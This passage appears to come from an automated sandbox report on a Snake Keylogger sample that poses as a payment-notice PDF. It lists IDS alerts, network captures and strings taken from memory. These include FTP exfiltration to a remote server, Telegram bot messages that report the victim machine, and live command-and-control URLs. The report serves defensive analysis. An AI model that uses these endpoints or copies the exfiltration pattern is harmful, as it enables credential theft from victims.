                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7D609h20_2_06A7D360
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7E311h20_2_06A7E068
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_06A70040
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_06A70853
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7F471h20_2_06A7F1C8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A731E8h20_2_06A73116
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7EBC1h20_2_06A7E918

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.7:49748 -> 119.18.54.39:21
                Source: global trafficTCP traffic: 119.18.54.39 ports 43366,1,2,32582,47782,21
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.7:49742 -> 119.18.54.39:43366
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49711 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49713 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49726 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49705 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49715 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49717 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49709 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49721 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49722 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49731 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49716 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49743 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49735 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49728 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49732 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49730 -> 188.114.96.3:443
                Source: unknownFTP traffic detected: 119.18.54.39:21 -> 192.168.2.7:49737 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49706 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49727 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: awaratrendz.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 03 Oct 2024 07:16:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 03 Oct 2024 07:16:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://awaratrendz.com
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1360405295.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1451353095.0000000002B12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20a
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
